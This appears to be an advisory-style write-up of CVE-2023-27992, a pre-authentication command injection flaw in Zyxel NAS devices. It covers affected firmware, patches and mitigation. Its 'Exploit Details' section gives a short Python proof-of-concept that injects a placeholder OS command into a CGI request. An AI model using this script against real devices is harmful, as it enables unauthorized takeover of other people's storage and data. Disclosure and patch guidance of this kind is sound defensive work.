CVE-2023-27992: Pre-Authentication Command Injection Vulnerability in Zyxel NAS Devices

A pre-authentication command injection vulnerability has been discovered in Zyxel NAS326, NAS540, and NAS542 devices. This vulnerability, identified as CVE-2023-27992, could allow an unauthenticated attacker to execute operating system (OS) commands remotely by sending a crafted HTTP request. All Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C, NAS540 firmware versions prior to V5.21(AATB.11)C, and NAS542 firmware versions prior to V5.21(ABAG.11)C are affected by this vulnerability.

Overview

This vulnerability exploits the firmware's inability to properly sanitize user input, making it possible for an attacker to inject OS commands and execute them without authentication. By sending a crafted HTTP request, a remote attacker could execute arbitrary code on the affected device, potentially gaining total control over it and the data stored within.

Exploit Details

To exploit this vulnerability, an attacker would need to send a carefully crafted HTTP request to a vulnerable Zyxel NAS device. Below is a simple Python script that demonstrates how a payload could be crafted and sent to the target device:

import requests

# Replace target_ip with actual target's IP address
target_ip = 'http://192.168.1.1';
payload = '; YOUR_COMMAND_HERE ;'  # Replace with desired OS command

url = f'{target_ip}/cgi-bin/downloads.cgi?FILE;/USB_1/&XUA_NOT_EMPTY;/&NO_LINK;/&FILENAME;{payload}'

response = requests.get(url)

In this code snippet, replace YOUR_COMMAND_HERE with the desired OS command and replace target_ip with the actual target's IP address. If successful, the target device will execute the payload and may provide useful information as a result.

Mitigation and Patching

To mitigate this vulnerability, it is essential to install the latest security patch provided by Zyxel on the affected NAS devices. Zyxel has already released firmware updates addressing the CVE-2023-27992 vulnerability:

- NAS326: Download firmware V5.21(AAZF.14)C here
- NAS540: Download firmware V5.21(AATB.11)C here
- NAS542: Download firmware V5.21(ABAG.11)C here

To further ensure your device's security, it is recommended to follow network security best practices, such as employing network intrusion detection systems, firewalls, and implementing strong access control policies.

Conclusion

CVE-2023-27992 represents a significant security risk that could easily result in unauthorized access and control over Zyxel NAS326, NAS540, and NAS542 devices. It is essential for network administrators and users to update their firmware to the latest version to protect against this vulnerability. Following network security best practices will further help mitigate the risks associated with this vulnerability.

Timeline

Published on: 06/19/2023 12:15:00 UTC
Last modified on: 06/20/2023 07:12:00 UTC